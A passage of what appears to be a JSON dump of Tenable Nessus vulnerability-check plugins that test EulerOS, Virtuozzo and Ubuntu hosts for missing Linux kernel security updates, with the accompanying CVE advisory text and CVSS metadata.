script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:uvp:3.0.1.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (uvp != \"3.0.1.0\") audit(AUDIT_OS_NOT, \"EulerOS Virtualization 3.0.1.0\");\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"aarch64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"aarch64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-4.19.28-1.2.117\",\n \"kernel-devel-4.19.28-1.2.117\",\n \"kernel-headers-4.19.28-1.2.117\",\n \"kernel-tools-4.19.28-1.2.117\",\n \"kernel-tools-libs-4.19.28-1.2.117\",\n \"kernel-tools-libs-devel-4.19.28-1.2.117\",\n \"perf-4.19.28-1.2.117\",\n \"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-13T06:35:13", "bulletinFamily": "scanner", "description": "According to the versions of the parallels-server-bm-release /\nvzkernel / etc packages installed, the Virtuozzo installation on the\nremote host is affected by the following vulnerabilities :\n\n - The do_get_mempolicy() function in ", "modified": "2019-12-02T00:00:00", "id": "VIRTUOZZO_VZA-2018-041.NASL", "href": "https://www.tenable.com/plugins/nessus/110694", "published": "2018-06-26T00:00:00", "title": "Virtuozzo 6 : parallels-server-bm-release / vzkernel / etc (VZA-2018-041)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110694);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:09\");\n\n script_cve_id(\n \"CVE-2012-6701\",\n \"CVE-2015-8830\",\n \"CVE-2016-8650\",\n \"CVE-2017-12190\",\n \"CVE-2017-18203\",\n \"CVE-2017-2671\",\n \"CVE-2017-6001\",\n \"CVE-2017-7616\",\n \"CVE-2017-7889\",\n \"CVE-2018-10675\",\n \"CVE-2018-5803\",\n \"CVE-2018-7757\"\n );\n\n script_name(english:\"Virtuozzo 6 : parallels-server-bm-release / vzkernel / etc (VZA-2018-041)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the parallels-server-bm-release /\nvzkernel / etc packages installed, the Virtuozzo installation on the\nremote host is affected by the following vulnerabilities :\n\n - The do_get_mempolicy() function in 'mm/mempolicy.c' in\n the Linux kernel allows local users to hit a\n use-after-free bug via crafted system calls and thus\n cause a denial of service (DoS) or possibly have\n unspecified other impact. Due to the nature of the\n flaw, privilege escalation cannot be fully ruled out.\n\n - It was found that AIO interface didn't use the proper\n rw_verify_area() helper function with extended\n functionality, for example, mandatory locking on the\n file. Also rw_verify_area() makes extended checks, for\n example, that the size of the access doesn't cause\n overflow of the provided offset limits. This integer\n overflow in fs/aio.c in the Linux kernel before 3.4.1\n allows local users to cause a denial of service or\n possibly have unspecified other impact via a large AIO\n iovec.\n\n - Integer overflow in the aio_setup_single_vector\n function in fs/aio.c in the Linux kernel 4.0 allows\n local users to cause a denial of service or possibly\n have unspecified other impact via a large AIO iovec.\n NOTE: this vulnerability exists because of a\n CVE-2012-6701 regression.\n\n - A flaw was found in the Linux kernel key management\n subsystem in which a local attacker could crash the\n kernel or corrupt the stack and additional memory\n (denial of service) by supplying a specially crafted\n RSA key. This flaw panics the machine during the\n verification of the RSA key.\n\n - A race condition leading to a NULL pointer dereference\n was found in the Linux kernel's Link Layer Control\n implementation. A local attacker with access to ping\n sockets could use this flaw to crash the system.\n\n - It was found that the original fix for CVE-2016-6786\n was incomplete. There exist a race between two\n concurrent sys_perf_event_open() calls when both try\n and move the same pre-existing software group into a\n hardware context.\n\n - Incorrect error handling in the set_mempolicy() and\n mbind() compat syscalls in 'mm/mempolicy.c' in the\n Linux kernel allows local users to obtain sensitive\n information from uninitialized stack data by triggering\n failure of a certain bitmap operation.\n\n - The mm subsystem in the Linux kernel through 4.10.10\n does not properly enforce the CONFIG_STRICT_DEVMEM\n protection mechanism, which allows local users to read\n or write to kernel memory locations in the first\n megabyte (and bypass slab-allocation access\n restrictions) via an application that opens the\n /dev/mem file, related to arch/x86/mm/init.c and\n drivers/char/mem.c.\n\n - It was found that in the Linux kernel through\n v4.14-rc5, bio_map_user_iov() and bio_unmap_user() in\n 'block/bio.c' do unbalanced pages refcounting if IO\n vector has small consecutive buffers belonging to the\n same page. bio_add_pc_page() merges them into one, but\n the page reference is never dropped, causing a memory\n leak and possible system lockup due to out-of-memory\n condition.\n\n - The Linux kernel, before version 4.14.3, is vulnerable\n to a denial of service in\n drivers/md/dm.c:dm_get_from_kobject() which can be\n caused by local users leveraging a race condition with\n __dm_destroy() during creation and removal of DM\n devices. Only privileged local users (with\n CAP_SYS_ADMIN capability) can directly perform the\n ioctl operations for dm device creation and removal and\n this would typically be outside the direct control of\n the unprivileged attacker.\n\n - An error in the '_sctp_make_chunk()' function\n (net/sctp/sm_make_chunk.c) when handling SCTP, packet\n length can be exploited by a malicious local user to\n cause a kernel crash and a DoS.\n\n - Memory leak in the sas_smp_get_phy_events function in\n drivers/scsi/libsas/sas_expander.c in the Linux kernel\n allows local users to cause a denial of service (kernel\n memory exhaustion) via multiple read accesses to files\n in the /sys/class/sas_phy directory.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2945474\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2018:1854\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected parallels-server-bm-release / vzkernel / etc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:parallels-server-bm-release\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzkernel-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzmodules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:vzmodules-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 6.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nflag = 0;\n\npkgs = [\"parallels-server-bm-release-6.0.12-3709\",\n \"vzkernel-2.6.32-042stab131.1\",\n \"vzkernel-devel-2.6.32-042stab131.1\",\n \"vzkernel-firmware-2.6.32-042stab131.1\",\n \"vzmodules-2.6.32-042stab131.1\",\n \"vzmodules-devel-2.6.32-042stab131.1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"Virtuozzo-6\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"parallels-server-bm-release / vzkernel / etc\");\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:46:56", "bulletinFamily": "scanner", "description": "It was discovered that a buffer overflow existed in the Bluetooth\nstack of the Linux kernel when handling L2CAP configuration responses.\nA physically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-1000251)\n\nIt was discovered that the asynchronous I/O (aio) subsystem of the\nLinux kernel did not properly set permissions on aio memory mappings\nin some situations. An attacker could use this to more easily exploit\nother vulnerabilities. (CVE-2016-10044)\n\nBaozeng Ding and Andrey Konovalov discovered a race condition in the\nL2TPv3 IP Encapsulation implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-10200)\n\nAndreas Gruenbacher and Jan Kara discovered that the filesystem\nimplementation in the Linux kernel did not clear the setgid bit during\na setxattr call. A local attacker could use this to possibly elevate\ngroup privileges. (CVE-2016-7097)\n\nSergej Schumilo, Ralf Spenneberg, and Hendrik Schwartke discovered\nthat the key management subsystem in the Linux kernel did not properly\nallocate memory in some situations. A local attacker could use this to\ncause a denial of service (system crash). (CVE-2016-8650)\n\nVlad Tsyrklevich discovered an integer overflow vulnerability in the\nVFIO PCI driver for the Linux kernel. A local attacker with access to\na vfio PCI device file could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2016-9083,\nCVE-2016-9084)\n\nIt was discovered that an information leak existed in\n__get_user_asm_ex() in the Linux kernel. A local attacker could use\nthis to expose sensitive information. (CVE-2016-9178)\n\nCAI Qian discovered that the sysctl implementation in the Linux kernel\ndid not properly perform reference counting in some situations. An\nunprivileged attacker could use this to cause a denial of service\n(system hang). (CVE-2016-9191)\n\nIt was discovered that the keyring implementation in the Linux kernel\nin some situations did not prevent special internal keyrings from\nbeing joined by userspace keyrings. A privileged local attacker could\nuse this to bypass module verification. (CVE-2016-9604)\n\nIt was discovered that an integer overflow existed in the trace\nsubsystem of the Linux kernel. A local privileged attacker could use\nthis to cause a denial of service (system crash). (CVE-2016-9754)\n\nAndrey Konovalov discovered that the IPv4 implementation in the Linux\nkernel did not properly handle invalid IP options in some situations.\nAn attacker could use this to cause a denial of service or possibly\nexecute arbitrary code. (CVE-2017-5970)\n\nDmitry Vyukov discovered that the Linux kernel did not properly handle\nTCP packets with the URG flag. A remote attacker could use this to\ncause a denial of service. (CVE-2017-6214)\n\nIt was discovered that a race condition existed in the AF_PACKET\nhandling code in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2017-6346)\n\nIt was discovered that the keyring implementation in the Linux kernel\ndid not properly restrict searches for dead keys. A local attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-6951)\n\nDmitry Vyukov discovered that the generic SCSI (sg) subsystem in the\nLinux kernel contained a stack-based buffer overflow. A local attacker\nwith access to an sg device could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2017-7187)\n\nEric Biggers discovered a memory leak in the keyring implementation in\nthe Linux kernel. A local attacker could use this to cause a denial of\nservice (memory consumption). (CVE-2017-7472)\n\nIt was discovered that a buffer overflow existed in the Broadcom\nFullMAC WLAN driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2017-7541).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2019-12-02T00:00:00", "id": "UBUNTU_USN-3422-1.NASL", "href": "https://www.tenable.com/plugins/nessus/103326", "published": "2017-09-19T00:00:00", "title": "Ubuntu 14.04 LTS : linux vulnerabilities (USN-3422-1) (BlueBorne)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3422-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103326);\n script_version(\"3.9\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-7097\", \"CVE-2016-8650\", \"CVE-2016-9083\", \"CVE-2016-9084\", \"CVE-2016-9178\", \"CVE-2016-9191\", \"CVE-2016-9604\", \"CVE-2016-9754\", \"CVE-2017-1000251\", \"CVE-2017-5970\", \"CVE-2017-6214\", \"CVE-2017-6346\", \"CVE-2017-6951\", \"CVE-2017-7187\", \"CVE-2017-7472\", \"CVE-2017-7541\");\n script_xref(name:\"USN\", value:\"3422-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerabilities (USN-3422-1) (BlueBorne)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that a buffer overflow existed in the Bluetooth\nstack of the Linux kernel when handling L2CAP configuration responses.\nA physically proximate attacker could use this to cause a denial of\nservice (system crash). (CVE-2017-1000251)\n\nIt was discovered that the asynchronous I/O (aio) subsystem of the\nLinux kernel did not properly set permissions on aio memory mappings\nin some situations. An attacker could use this to more easily exploit\nother vulnerabilities. (CVE-2016-10044)\n\nBaozeng Ding and Andrey Konovalov discovered a race condition in the\nL2TPv3 IP Encapsulation implementation in the Linux kernel. A local\nattacker could use this to cause a denial of service (system crash) or\npossibly execute arbitrary code. (CVE-2016-10200)\n\nAndreas Gruenbacher and Jan Kara discovered that the filesystem\nimplementation in the Linux kernel did not clear the setgid bit during\na setxattr call. A local attacker could use this to possibly elevate\ngroup privileges. (CVE-2016-7097)\n\nSergej Schumilo, Ralf Spenneberg, and Hendrik Schwartke discovered\nthat the key management subsystem in the Linux kernel did not properly\nallocate memory in some situations. A local attacker could use this to\ncause a denial of service (system crash). (CVE-2016-8650)\n\nVlad Tsyrklevich discovered an integer overflow vulnerability in the\nVFIO PCI driver for the Linux kernel. A local attacker with access to\na vfio PCI device file could use this to cause a denial of service\n(system crash) or possibly execute arbitrary code. (CVE-2016-9083,\nCVE-2016-9084)\n\nIt was discovered that an information leak existed in\n__get_user_asm_ex() in the Linux kernel. A local attacker could use\nthis to expose sensitive information. (CVE-2016-9178)\n\nCAI Qian discovered that the sysctl implementation in the Linux kernel\ndid not properly perform reference counting in some situations. An\nunprivileged attacker could use this to cause a denial of service\n(system hang). (CVE-2016-9191)\n\nIt was discovered that the keyring implementation in the Linux kernel\nin some situations did not prevent special internal keyrings from\nbeing joined by userspace keyrings. A privileged local attacker could\nuse this to bypass module verification. (CVE-2016-9604)\n\nIt was discovered that an integer overflow existed in the trace\nsubsystem of the Linux kernel. A local privileged attacker could use\nthis to cause a denial of service (system crash). (CVE-2016-9754)\n\nAndrey Konovalov discovered that the IPv4 implementation in the Linux\nkernel did not properly handle invalid IP options in some situations.\nAn attacker could use this to cause a denial of service or possibly\nexecute arbitrary code. (CVE-2017-5970)\n\nDmitry Vyukov discovered that the Linux kernel did not properly handle\nTCP packets with the URG flag. A remote attacker could use this to\ncause a denial of service. (CVE-2017-6214)\n\nIt was discovered that a race condition existed in the AF_PACKET\nhandling code in the Linux kernel. A local attacker could use this to\ncause a denial of service (system crash) or possibly execute arbitrary\ncode. (CVE-2017-6346)\n\nIt was discovered that the keyring implementation in the Linux kernel\ndid not properly restrict searches for dead keys. A local attacker\ncould use this to cause a denial of service (system crash).\n(CVE-2017-6951)\n\nDmitry Vyukov discovered that the generic SCSI (sg) subsystem in the\nLinux kernel contained a stack-based buffer overflow. A local attacker\nwith access to an sg device could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2017-7187)\n\nEric Biggers discovered a memory leak in the keyring implementation in\nthe Linux kernel. A local attacker could use this to cause a denial of\nservice (memory consumption). (CVE-2017-7472)\n\nIt was discovered that a buffer overflow existed in the Broadcom\nFullMAC WLAN driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or possibly execute\narbitrary code. (CVE-2017-7541).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3422-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/09/19\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2017-2019 Canonical, Inc. / NASL script (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-10044\", \"CVE-2016-10200\", \"CVE-2016-7097\", \"CVE-2016-8650\", \"CVE-2016-9083\", \"CVE-2016-9084\", \"CVE-2016-9178\", \"CVE-2016-9191\", \"CVE-2016-9604\", \"CVE-2016-9754\", \"CVE-2017-1000251\", \"CVE-2017-5970\", \"CVE-2017-6214\", \"CVE-2017-6346\", \"CVE-2017-6951\", \"CVE-2017-7187\", \"CVE-2017-7472\", \"CVE-2017-7541\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3422-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-132-generic\", pkgver:\"3.13.0-132.181\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-132-generic-lpae\", pkgver:\"3.13.0-132.181\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-3.13.0-132-lowlatency\", pkgver:\"3.13.0-132.181\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic\", pkgver:\"3.13.0.132.141\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lpae\", pkgver:\"3.13.0.132.141\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"3.13.0.132.141\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae / etc\");\n}\n", "cvss": {"score": 8.3, "vector": "AV:A/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T06:35:44", "bulletinFamily": "scanner", "description": "An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated kernel packages include several security issues and\nnumerous bug fixes. Space precludes documenting all of these bug fixes\nin this advisory. To see the complete list of bug fixes, users are\ndirected to the related Knowledge Article:\nhttps://access.redhat.com/articles/2986951.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel", "modified": "2019-12-02T00:00:00", "id": "VIRTUOZZO_VZLSA-2017-0933.NASL", "href": "https://www.tenable.com/plugins/nessus/101449", "published": "2017-07-13T00:00:00", "title": "Virtuozzo 7 : kernel / kernel-abi-whitelists / kernel-debug / etc (VZLSA-2017-0933)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(101449);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/20 11:04:17\");\n\n script_cve_id(\n \"CVE-2016-8650\",\n \"CVE-2016-9793\",\n \"CVE-2017-2618\",\n \"CVE-2017-2636\"\n );\n\n script_name(english:\"Virtuozzo 7 : kernel / kernel-abi-whitelists / kernel-debug / etc (VZLSA-2017-0933)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update for kernel is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThese updated kernel packages include several security issues and\nnumerous bug fixes. Space precludes documenting all of these bug fixes\nin this advisory. To see the complete list of bug fixes, users are\ndirected to the related Knowledge Article:\nhttps://access.redhat.com/articles/2986951.\n\nSecurity Fix(es) :\n\n* A race condition flaw was found in the N_HLDC Linux kernel driver\nwhen accessing n_hdlc.tbuf list that can lead to double free. A local,\nunprivileged user able to set the HDLC line discipline on the tty\ndevice could use this flaw to increase their privileges on the system.\n(CVE-2017-2636, Important)\n\n* A flaw was found in the Linux kernel key management subsystem in\nwhich a local attacker could crash the kernel or corrupt the stack and\nadditional memory (denial of service) by supplying a specially crafted\nRSA key. This flaw panics the machine during the verification of the\nRSA key. (CVE-2016-8650, Moderate)\n\n* A flaw was found in the Linux kernel's implementation of setsockopt\nfor the SO_{SND|RCV}BUFFORCE setsockopt() system call. Users with\nnon-namespace CAP_NET_ADMIN are able to trigger this call and create a\nsituation in which the sockets sendbuff data size could be negative.\nThis could adversely affect memory allocations and create situations\nwhere the system could crash or cause memory corruption.\n(CVE-2016-9793, 